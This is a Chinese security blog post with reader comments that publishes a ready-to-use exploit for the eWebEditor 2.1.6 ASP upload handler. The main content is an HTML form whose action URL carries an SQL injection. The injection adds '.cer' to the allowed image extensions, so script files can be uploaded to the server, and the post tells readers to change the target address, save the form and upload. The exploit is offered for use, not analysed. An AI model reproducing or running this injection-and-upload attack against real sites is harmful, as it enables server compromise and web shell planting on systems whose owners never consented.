eWebEditor 2.1.6 asp版 上传漏洞利用程序

2009-2-13 20:17:54  分类:漏洞信息  作者:xloong 已被围观loading 被网友评论3条 我要评论

eWebEditor 2.1.6 asp版 上传漏洞利用程序,修改上传地址保存为HTM文件,打开可以直接上传CER文件,测试成功。上传后地址看源文件。

<H1>eWebEditor 2.1.6 asp版 上传漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]

本文链接地址: http://www.15897.com/blog/post/eWebEditor-2.1.6-asp-upload-exploit.html

Tags: eWebEditor   exploit   漏洞信息  

| More

已有3位网友对本文做了一针见血的评论 【我要评论

  1. My Gravatar Icon nuke 说:

    这个漏洞出来很久了 怎么最近又炒热乎了?

  2. My Gravatar Icon xloong 说:

    老洞新看,温故知新,....。

  3. My Gravatar Icon nuke 说:

    这个漏洞最早是一个非安全界人士发掘的

    但是我测试成功率低的可怜
    不知道是不是人品问题

评论:



< # TEMPLATE_INCLUDE_POSTAD # >
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅RSS

搜 索

最新发表

最新评论

最新留言

其 他